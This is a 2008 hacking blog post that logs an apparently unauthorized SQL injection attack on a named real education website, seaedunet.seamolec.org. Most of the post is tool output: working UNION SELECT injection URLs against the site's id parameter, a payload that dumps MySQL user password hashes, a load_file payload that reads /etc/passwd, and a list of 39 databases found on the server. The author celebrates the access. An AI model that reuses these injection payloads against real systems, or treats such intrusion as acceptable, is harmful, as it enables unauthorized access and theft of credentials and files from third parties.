viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Wednesday, October 29, 2008

[SQLi] http://seaedunet.seamolec.org

5:27 PM Posted by viperfx07 No comments
Tool: schemafuzz.py v5.0

[+] URL:http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 17:19:39
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: seaedunet_db
User: seaedunet@localhost
Version: 5.0.32-Debian_7etch6-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4+FROM+mysql.user--

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,load_file(0x2f6574632f706173737764),2,3,4--

[-] [17:19:55]
[-] Total URL Requests 3
[-] Done


[+] URL:http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 17:20:33
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: seaedunet_db
User: seaedunet@localhost
Version: 5.0.32-Debian_7etch6-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 39

[0]apceiu_db
[1]blog_db
[2]chatseadunet_db
[3]claroline
[4]cocc_ifiti
[5]darmasiswa
[6]diaz
[7]dokeos
[8]dokeos_main
[9]dokeos_stats
[10]dokeos_user
[11]forum
[12]forumseadunet_db
[13]games
[14]helping_db
[15]homepage
[16]ibagz
[17]iblog
[18]inet
[19]jeni
[20]joomla
[21]konsultasismm_db
[22]mitra_db
[23]moo
[24]moodle
[25]moodleseaedunet_db
[26]mysql
[27]p4tk_db
[28]pgsd_db
[29]pictures
[30]research_db
[31]scholarship
[32]seaedunet_db
[33]seamolec
[34]searadio_db
[35]seminar08
[36]test
[37]training_db
[38]x7chat

[-] [17:24:19]
[-] Total URL Requests 41
[-] Done

0 comments:

Post a Comment